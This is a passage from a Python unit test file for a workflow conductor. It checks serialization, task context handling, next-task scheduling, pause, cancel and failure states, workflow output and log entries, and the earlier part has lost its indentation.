self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
user_inputs = inputs or {}
parent_context = context or {}
self.assertDictEqual(conductor._inputs, user_inputs)
self.assertDictEqual(conductor.get_workflow_input(), user_inputs)
self.assertDictEqual(conductor._parent_ctx, parent_context)
self.assertDictEqual(conductor.get_workflow_parent_context(), parent_context)
default_inputs = {'a': None, 'b': False}
init_ctx_value = dx.merge_dicts(default_inputs, user_inputs, True)
init_ctx_value = dx.merge_dicts(init_ctx_value, parent_context, True)
expected_ctx_entry = {'srcs': [], 'value': init_ctx_value}
self.assertDictEqual(conductor.get_workflow_initial_context(), expected_ctx_entry)
return conductor
def test_init(self):
conductor = self._prep_conductor()
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'context': {},
'input': {},
'output': None,
'state': states.UNSET,
'errors': [],
'log': [],
'flow': {
'staged': {'task1': {'ctxs': [0], 'ready': True}},
'tasks': {},
'sequence': [],
'contexts': [{'srcs': [], 'value': {'a': None, 'b': False}}]
}
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
def test_init_with_inputs(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs)
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'context': {},
'input': inputs,
'output': None,
'state': states.UNSET,
'errors': [],
'log': [],
'flow': {
'staged': {'task1': {'ctxs': [0], 'ready': True}},
'tasks': {},
'sequence': [],
'contexts': [{'srcs': [], 'value': inputs}]
}
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
def test_init_with_partial_inputs(self):
inputs = {'a': 123}
default_inputs = {'b': False}
expected_initial_ctx = dx.merge_dicts(inputs, default_inputs, True)
conductor = self._prep_conductor(inputs=inputs)
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'context': {},
'input': inputs,
'output': None,
'state': states.UNSET,
'errors': [],
'log': [],
'flow': {
'staged': {'task1': {'ctxs': [0], 'ready': True}},
'tasks': {},
'sequence': [],
'contexts': [{'srcs': [], 'value': expected_initial_ctx}]
}
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
def test_init_with_context(self):
context = {'parent': {'ex_id': '12345'}}
inputs = {'a': 123, 'b': True}
init_ctx = dx.merge_dicts(copy.deepcopy(inputs), copy.deepcopy(context))
conductor = self._prep_conductor(context=context, inputs=inputs)
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'context': context,
'input': inputs,
'output': None,
'state': states.UNSET,
'errors': [],
'log': [],
'flow': {
'staged': {'task1': {'ctxs': [0], 'ready': True}},
'tasks': {},
'sequence': [],
'contexts': [{'srcs': [], 'value': init_ctx}]
}
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
def test_serialization(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
# Mock task flows.
for i in range(1, 6):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'state': conductor.get_workflow_state(),
'flow': conductor.flow.serialize(),
'context': conductor.get_workflow_parent_context(),
'input': conductor.get_workflow_input(),
'output': conductor.get_workflow_output(),
'errors': conductor.errors,
'log': conductor.log
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
self.assertEqual(len(conductor.flow.tasks), 5)
self.assertEqual(len(conductor.flow.sequence), 5)
def test_get_workflow_initial_context(self):
conductor = self._prep_conductor()
expected_ctx_entry = {'srcs': [], 'value': {'a': None, 'b': False}}
self.assertDictEqual(conductor.get_workflow_initial_context(), expected_ctx_entry)
def test_get_workflow_initial_context_with_inputs(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
expected_ctx_entry = {'srcs': [], 'value': inputs}
self.assertDictEqual(conductor.get_workflow_initial_context(), expected_ctx_entry)
def test_get_start_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
next_task_name = 'task1'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
expected_ctx_value = {'a': 123, 'b': False}
expected_tasks = [self.format_task_item(next_task_name, expected_ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(), expected_tasks)
def test_get_start_tasks_when_graph_paused(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
conductor.request_workflow_state(states.PAUSING)
self.assertListEqual(conductor.get_next_tasks(), [])
conductor.request_workflow_state(states.PAUSED)
self.assertListEqual(conductor.get_next_tasks(), [])
def test_get_start_tasks_when_graph_canceled(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
conductor.request_workflow_state(states.CANCELING)
self.assertListEqual(conductor.get_next_tasks(), [])
conductor.request_workflow_state(states.CANCELED)
self.assertListEqual(conductor.get_next_tasks(), [])
def test_get_start_tasks_when_graph_abended(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
conductor.request_workflow_state(states.FAILED)
self.assertListEqual(conductor.get_next_tasks(), [])
def test_get_task(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
current_task = {'id': task_name, 'name': task_name}
expected_ctx = {'a': 123, 'b': False, '__current_task': current_task}
task = conductor.get_task(task_name)
self.assertEqual(task['id'], task_name)
self.assertEqual(task['name'], task_name)
self.assertDictEqual(task['ctx'], expected_ctx)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
task_name = 'task2'
current_task = {'id': task_name, 'name': task_name}
expected_ctx = {'a': 123, 'b': False, 'c': 'xyz', '__current_task': current_task}
task = conductor.get_task(task_name)
self.assertEqual(task['id'], task_name)
self.assertEqual(task['name'], task_name)
self.assertDictEqual(task['ctx'], expected_ctx)
def test_get_next_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
for i in range(1, 5):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
next_task_name = 'task' + str(i + 1)
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
expected_ctx_val = {'a': 123, 'b': False, 'c': 'xyz'}
expected_task = self.format_task_item(next_task_name, expected_ctx_val, next_task_spec)
self.assert_task_list(conductor.get_next_tasks(task_name), [expected_task])
def test_get_next_tasks_repeat_with_no_input(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
self.assertEqual(len(conductor.get_next_tasks()), 1)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.RUNNING))
self.assertEqual(len(conductor.get_next_tasks()), 0)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.SUCCEEDED))
self.assertEqual(len(conductor.get_next_tasks()), 1)
conductor.update_task_flow('task2', events.ActionExecutionEvent(states.RUNNING))
self.assertEqual(len(conductor.get_next_tasks()), 0)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.SUCCEEDED))
self.assertEqual(len(conductor.get_next_tasks()), 0)
def test_get_next_tasks_repeat_by_task_name(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
self.assertEqual(len(conductor.get_next_tasks()), 1)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.RUNNING))
self.assertEqual(len(conductor.get_next_tasks('task1')), 0)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.SUCCEEDED))
next_tasks = conductor.get_next_tasks('task1')
self.assertEqual(len(next_tasks), 1)
self.assertEqual(next_tasks[0]['name'], 'task2')
conductor.update_task_flow('task2', events.ActionExecutionEvent(states.RUNNING))
self.assertEqual(len(conductor.get_next_tasks('task2')), 0)
def test_get_next_tasks_from_staged(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
next_task_name = 'task1'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
expected_ctx_val = {'a': 123, 'b': False}
expected_task = self.format_task_item(next_task_name, expected_ctx_val, next_task_spec)
self.assert_task_list(conductor.get_next_tasks(), [expected_task])
for i in range(1, 5):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
next_task_name = 'task' + str(i + 1)
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
expected_ctx_val = {'a': 123, 'b': False, 'c': 'xyz'}
expected_task = self.format_task_item(next_task_name, expected_ctx_val, next_task_spec)
self.assert_task_list(conductor.get_next_tasks(), [expected_task])
def test_get_next_tasks_when_this_task_paused(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
task_name = 'task2'
next_task_name = 'task3'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.PAUSING))
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.PAUSED))
self.assertListEqual(conductor.get_next_tasks(task_name), [])
# After the previous task is paused, since there are no other tasks running,
# the workflow is paused. The workflow needs to be resumed manually.
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
conductor.request_workflow_state(states.RESUMING)
self.assertEqual(conductor.get_workflow_state(), states.RESUMING)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
def test_get_next_tasks_when_graph_paused(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
conductor.request_workflow_state(states.PAUSING)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.request_workflow_state(states.PAUSED)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.request_workflow_state(states.RESUMING)
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
def test_get_next_tasks_when_this_task_canceled(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
task_name = 'task2'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.CANCELING))
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.CANCELED))
self.assertListEqual(conductor.get_next_tasks(task_name), [])
def test_get_next_tasks_when_graph_canceled(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
conductor.request_workflow_state(states.CANCELING)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.request_workflow_state(states.CANCELED)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
def test_get_next_tasks_when_this_task_abended(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
task_name = 'task2'
conductor.graph.update_transition('task2', 'task3', 0, criteria=['<% succeeded() %>'])
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.FAILED))
self.assertEqual(conductor.get_workflow_state(), states.FAILED)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
def test_get_next_tasks_when_graph_abended(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
conductor.request_workflow_state(states.FAILED)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
def test_get_task_initial_context(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
task1_in_ctx = {'srcs': [], 'value': copy.deepcopy(inputs)}
self.assertDictEqual(conductor.get_task_initial_context(task_name), task1_in_ctx)
task2_in_ctx = {'srcs': [0], 'value': dx.merge_dicts(copy.deepcopy(inputs), {'c': 'xyz'})}
expected_context_list = [task1_in_ctx, task2_in_ctx]
self.assertListEqual(conductor.flow.contexts, expected_context_list)

    def test_get_task_transition_contexts(self):
        inputs = {'a': 123, 'b': True}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)

        # Use task1 to get the context for task2, which is staged but not yet running.
        conductor.update_task_flow('task1', events.ActionExecutionEvent(states.RUNNING))
        conductor.update_task_flow('task1', events.ActionExecutionEvent(states.SUCCEEDED))
        task2_in_ctx = {'srcs': [0], 'value': dx.merge_dicts(copy.deepcopy(inputs), {'c': 'xyz'})}
        expected_contexts = {'task2__0': task2_in_ctx}
        self.assertDictEqual(conductor.get_task_transition_contexts('task1'), expected_contexts)

        # Use task1 to get the context for task2, which is staged and already running.
        conductor.update_task_flow('task2', events.ActionExecutionEvent(states.RUNNING))
        task2_in_ctx = {'srcs': [0], 'value': dx.merge_dicts(copy.deepcopy(inputs), {'c': 'xyz'})}
        expected_contexts = {'task2__0': task2_in_ctx}
        self.assertDictEqual(conductor.get_task_transition_contexts('task1'), expected_contexts)

        # Use task2 to get the context for task3, which is not staged yet.
        self.assertDictEqual(conductor.get_task_transition_contexts('task2'), {})

        # Use task3, which is not yet in the task flow, to get the context.
        self.assertRaises(
            exc.InvalidTaskFlowEntry,
            conductor.get_task_transition_contexts,
            'task3'
        )

    def test_get_workflow_terminal_context_when_workflow_incomplete(self):
        inputs = {'a': 123, 'b': True}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
        self.assertRaises(exc.WorkflowContextError, conductor.get_workflow_terminal_context)

    def test_get_workflow_terminal_context_when_workflow_completed(self):
        inputs = {'a': 123, 'b': True}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)

        for i in range(1, 6):
            task_name = 'task' + str(i)
            conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
            conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))

        expected_ctx_value = {'a': 123, 'b': True, 'c': 'xyz'}
        expected_ctx_entry = {'src': [4], 'term': True, 'value': expected_ctx_value}
        self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
        self.assertDictEqual(conductor.get_workflow_terminal_context(), expected_ctx_entry)

    def test_get_workflow_output_when_workflow_incomplete(self):
        inputs = {'a': 123, 'b': True}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)

        for i in range(1, 5):
            task_name = 'task' + str(i)
            conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
            conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))

        self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
        self.assertIsNone(conductor.get_workflow_output())

    def test_get_workflow_output_when_workflow_failed(self):
        inputs = {'a': 123, 'b': True}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)

        for i in range(1, 5):
            task_name = 'task' + str(i)
            conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
            conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))

        task_name = 'task5'
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.FAILED))

        expected_output = {'data': {'a': 123, 'b': True, 'c': 'xyz'}}
        self.assertEqual(conductor.get_workflow_state(), states.FAILED)
        self.assertDictEqual(conductor.get_workflow_output(), expected_output)

    def test_get_workflow_output_when_workflow_succeeded(self):
        inputs = {'a': 123, 'b': True}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)

        for i in range(1, 6):
            task_name = 'task' + str(i)
            conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
            conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))

        expected_output = {'data': {'a': 123, 'b': True, 'c': 'xyz'}}
        self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
        self.assertDictEqual(conductor.get_workflow_output(), expected_output)

    def test_set_workflow_canceling_when_no_active_tasks(self):
        inputs = {'a': 123}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
        task_name = 'task1'
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
        conductor.request_workflow_state(states.CANCELING)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELED)

    def test_set_workflow_canceled_when_no_active_tasks(self):
        inputs = {'a': 123}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
        task_name = 'task1'
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
        conductor.request_workflow_state(states.CANCELED)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELED)

    def test_set_workflow_canceling_when_has_active_tasks(self):
        inputs = {'a': 123}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
        task_name = 'task1'
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
        conductor.request_workflow_state(states.CANCELING)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELING)

    def test_set_workflow_canceled_when_has_active_tasks(self):
        inputs = {'a': 123}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
        task_name = 'task1'
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
        conductor.request_workflow_state(states.CANCELED)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELING)

    def test_set_workflow_pausing_when_no_active_tasks(self):
        inputs = {'a': 123}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
        task_name = 'task1'
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
        conductor.request_workflow_state(states.PAUSING)
        self.assertEqual(conductor.get_workflow_state(), states.PAUSED)

    def test_set_workflow_paused_when_no_active_tasks(self):
        inputs = {'a': 123}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
        task_name = 'task1'
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
        conductor.request_workflow_state(states.PAUSED)
        self.assertEqual(conductor.get_workflow_state(), states.PAUSED)

    def test_set_workflow_pausing_when_has_active_tasks(self):
        inputs = {'a': 123}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
        task_name = 'task1'
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
        conductor.request_workflow_state(states.PAUSING)
        self.assertEqual(conductor.get_workflow_state(), states.PAUSING)

    def test_set_workflow_paused_when_has_active_tasks(self):
        inputs = {'a': 123}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
        task_name = 'task1'
        conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
        conductor.request_workflow_state(states.PAUSED)
        self.assertEqual(conductor.get_workflow_state(), states.PAUSING)

    def test_append_log_entries(self):
        inputs = {'a': 123, 'b': True}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)

        extra = {'x': 1234}
        conductor.log_entry('info', 'The workflow is running as expected.', data=extra)
        conductor.log_entry('warn', 'The task may be running a little bit slow.', task_id='task1')
        conductor.log_entry('error', 'This is baloney.', task_id='task1')
        conductor.log_error(TypeError('Something is not right.'), task_id='task1')
        conductor.log_errors([KeyError('task1'), ValueError('foobar')], task_id='task1')

        self.assertRaises(
            exc.WorkflowLogEntryError,
            conductor.log_entry,
            'foobar',
            'This is foobar.'
        )

        expected_log_entries = [
            {
                'type': 'info',
                'message': 'The workflow is running as expected.',
                'data': extra
            },
            {
                'type': 'warn',
                'message': 'The task may be running a little bit slow.',
                'task_id': 'task1'
            }
        ]

        expected_errors = [
            {
                'type': 'error',
                'message': 'This is baloney.',
                'task_id': 'task1'
            },
            {
                'type': 'error',
                'message': 'TypeError: Something is not right.',
                'task_id': 'task1'
            },
            {
                'type': 'error',
                'message': "KeyError: 'task1'",
                'task_id': 'task1'
            },
            {
                'type': 'error',
                'message': 'ValueError: foobar',
                'task_id': 'task1'
            }
        ]

        self.assertListEqual(conductor.log, expected_log_entries)
        self.assertListEqual(conductor.errors, expected_errors)

        # Serialize and check.
        data = conductor.serialize()

        expected_data = {
            'spec': conductor.spec.serialize(),
            'graph': conductor.graph.serialize(),
            'context': {},
            'input': inputs,
            'output': None,
            'state': states.RUNNING,
            'errors': expected_errors,
            'log': expected_log_entries,
            'flow': {
                'staged': {'task1': {'ctxs': [0], 'ready': True}},
                'tasks': {},
                'sequence': [],
                'contexts': [{'srcs': [], 'value': inputs}]
            }
        }

        self.assertDictEqual(data, expected_data)

        # Deserialize and check.
        conductor = conducting.WorkflowConductor.deserialize(data)
        self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
        self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
        self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
        self.assertEqual(len(conductor.graph._graph.node), 5)
        self.assertIsInstance(conductor.flow, conducting.TaskFlow)
        self.assertListEqual(conductor.log, expected_log_entries)
        self.assertListEqual(conductor.errors, expected_errors)

    def test_append_duplicate_log_entries(self):
        inputs = {'a': 123, 'b': True}
        conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)

        extra = {'x': 1234}
        conductor.log_entry('info', 'The workflow is running as expected.', data=extra)
        conductor.log_entry('info', 'The workflow is running as expected.', data=extra)
        conductor.log_entry('warn', 'The task may be running a little bit slow.', task_id='task1')
        conductor.log_entry('warn', 'The task may be running a little bit slow.', task_id='task1')
        conductor.log_entry('error', 'This is baloney.', task_id='task1')
        conductor.log_entry('error', 'This is baloney.', task_id='task1')
        conductor.log_error(TypeError('Something is not right.'), task_id='task1')
        conductor.log_error(TypeError('Something is not right.'), task_id='task1')
        conductor.log_errors([KeyError('task1'), ValueError('foobar')], task_id='task1')
        conductor.log_errors([KeyError('task1'), ValueError('foobar')], task_id='task1')

        expected_log_entries = [
            {
                'type': 'info',
                'message': 'The workflow is running as expected.',
                'data': extra
            },
            {
                'type': 'warn',
                'message': 'The task may be running a little bit slow.',
                'task_id': 'task1'
            }
        ]

        expected_errors = [
            {
                'type': 'error',
                'message': 'This is baloney.',
                'task_id': 'task1'
            },
            {
                'type': 'error',
                'message': 'TypeError: Something is not right.',
                'task_id': 'task1'
            },
            {
                'type': 'error',
                'message': "KeyError: 'task1'",
                'task_id': 'task1'
            },
            {
                'type': 'error',
                'message': 'ValueError: foobar',
                'task_id': 'task1'
            }
        ]

        self.assertListEqual(conductor.log, expected_log_entries)
        self.assertListEqual(conductor.errors, expected_errors)